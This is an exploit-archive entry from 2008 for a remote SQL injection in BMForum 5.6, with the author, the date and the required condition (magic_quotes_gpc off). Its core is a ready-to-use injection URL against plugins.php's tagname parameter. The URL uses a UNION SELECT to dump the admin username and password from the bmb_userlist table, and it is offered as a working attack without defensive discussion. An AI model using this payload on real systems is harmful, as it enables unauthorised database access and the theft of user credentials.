[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : BMForum 5.6 (tagname) Remote SQL Injection Vulnerability
# Published : 2008-10-01
# Author : ~!Dok_tOR!~
# Previous Title : MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability
# Next Title : Discussion Forums 2k v3.3 Multiple SQL Injection Vulnerabilities


Author: ~!Dok_tOR!~
Date found: 30.09.08
Product: BMForum
Version: 5.6
URL: www.bmforum.com
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

Exploit:

http://localhost/[installdir]/plugins.php?p=tags&forumid=0&tagname=-1'+union+select+1,concat_ws(0x3a,username,pwd),3,4+from+bmb_userlist+where+userid=1/*

# www.Syue.com [2008-10-01]